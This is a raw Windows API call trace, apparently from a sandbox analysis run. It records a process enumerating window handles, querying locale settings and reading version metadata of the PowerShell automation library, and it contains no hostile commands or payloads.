	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7ec
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5b8
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x754
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x664
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x640
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x700
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x410
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7a0
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x3b4
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5cc
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5d4
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7c0
	[0104.791] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x364
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x240
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x560
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x57c
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7b0
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x6a4
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x32c
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x670
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4f0
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x514
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x50c
	[0104.792] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x514
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x50c
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x514
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4f0
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4f0
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x58c
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x578
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x530
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x508
	[0104.793] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4f4
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x794
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x448
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0104.794] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x538
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x938
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7c8
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xbdc
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xbe0
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9f4
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x964
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9e8
	[0104.795] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9e8
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb40
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa00
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9f0
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9e0
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9d0
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9c0
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9b0
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9a0
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x990
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x980
	[0104.796] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x970
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x960
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x950
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x940
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x930
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x920
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x910
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x900
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8f0
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8e0
	[0104.797] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8d0
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8c0
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8b0
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8a0
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x890
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x880
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x870
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x860
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x850
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x840
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x830
	[0104.798] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x820
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x810
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x20c
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7c4
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc0
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x688
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x6c0
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x408
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7d4
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x544
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x540
	[0104.799] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x71c
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x31c
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7ec
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5b8
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x754
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x664
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x640
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x700
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x410
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7a0
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x3b4
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5cc
	[0104.800] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5d4
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7c0
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x364
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x240
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x560
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x57c
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7b0
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x6a4
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x32c
	[0104.801] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x670
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x50c
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x514
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4f0
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x58c
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4f4
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x794
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.802] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0104.806] WerSetFlags () returned 0x0
	[0104.814] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0104.814] CoTaskMemFree (pv=0x0) 
	[0104.815] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc40 | out: pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc40) returned 1
	[0104.815] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x2ce50b8, pcchLanguagesBuffer=0xcdc40 | out: pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x2ce50b8, pcchLanguagesBuffer=0xcdc40) returned 1
	[0104.820] CoTaskMemAlloc (cb=0x24) returned 0x22dac0
	[0104.820] GetUserDefaultLocaleName (in: lpLocaleName=0x22dac0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0104.820] CoTaskMemFree (pv=0x22dac0) 
	[0104.916] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0104.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.916] CoTaskMemFree (pv=0x230700) 
	[0104.918] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0104.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.918] CoTaskMemFree (pv=0x230700) 
	[0104.920] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0104.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.920] CoTaskMemFree (pv=0x230700) 
	[0104.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.930] SetErrorMode (uMode=0x1) returned 0x1
	[0104.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd8c0 | out: lpFileInformation=0xcd8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0104.930] SetErrorMode (uMode=0x1) returned 0x1
	[0104.931] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdb30 | out: lpdwHandle=0xcdb30) returned 0x94c
	[0104.932] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce8948 | out: lpData=0x2ce8948) returned 1
	[0104.933] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdaa8, puLen=0xcdaa0 | out: lplpBuffer=0xcdaa8*=0x2ce89e4, puLen=0xcdaa0) returned 1
	[0104.933] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8ac0, puLen=0xcda10) returned 1
	[0104.933] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0104.933] CoTaskMemAlloc (cb=0x2e) returned 0x228ef0
	[0104.933] lstrcpyW (in: lpString1=0x228ef0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0104.933] CoTaskMemFree (pv=0x228ef0) 
	[0104.933] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8b14, puLen=0xcda10) returned 1
	[0104.933] lstrlenW (lpString="System.Management.Automation") returned 28
	[0104.933] CoTaskMemAlloc (cb=0x3c) returned 0x232ff0
	[0104.933] lstrcpyW (in: lpString1=0x232ff0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0104.933] CoTaskMemFree (pv=0x232ff0) 
	[0104.933] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8b70, puLen=0xcda10) returned 1
	[0104.933] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0104.933] CoTaskMemAlloc (cb=0x20) returned 0x22db20
	[0104.933] lstrcpyW (in: lpString1=0x22db20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0104.933] CoTaskMemFree (pv=0x22db20) 
	[0104.933] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8bb0, puLen=0xcda10) returned 1
	[0104.933] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0104.934] CoTaskMemAlloc (cb=0x44) returned 0x232ff0
	[0104.934] lstrcpyW (in: lpString1=0x232ff0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0104.934] CoTaskMemFree (pv=0x232ff0) 
	[0104.934] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8c18, puLen=0xcda10) returned 1
	[0104.934] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0104.934] CoTaskMemAlloc (cb=0x76) returned 0x1c8930
	[0104.934] lstrcpyW (in: lpString1=0x1c8930, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0104.934] CoTaskMemFree (pv=0x1c8930) 
	[0104.934] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8cb4, puLen=0xcda10) returned 1
	[0104.934] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0104.934] CoTaskMemAlloc (cb=0x44) returned 0x232ff0
	[0104.934] lstrcpyW (in: lpString1=0x232ff0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0104.934] CoTaskMemFree (pv=0x232ff0) 
	[0104.934] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8d18, puLen=0xcda10) returned 1
	[0104.934] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0104.934] CoTaskMemAlloc (cb=0x58) returned 0x1908d0
	[0104.934] lstrcpyW (in: lpString1=0x1908d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0104.934] CoTaskMemFree (pv=0x1908d0) 
	[0104.934] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8d94, puLen=0xcda10) returned 1
	[0104.934] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0104.934] CoTaskMemAlloc (cb=0x20) returned 0x22db20
	[0104.934] lstrcpyW (in: lpString1=0x22db20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0104.935] CoTaskMemFree (pv=0x22db20) 
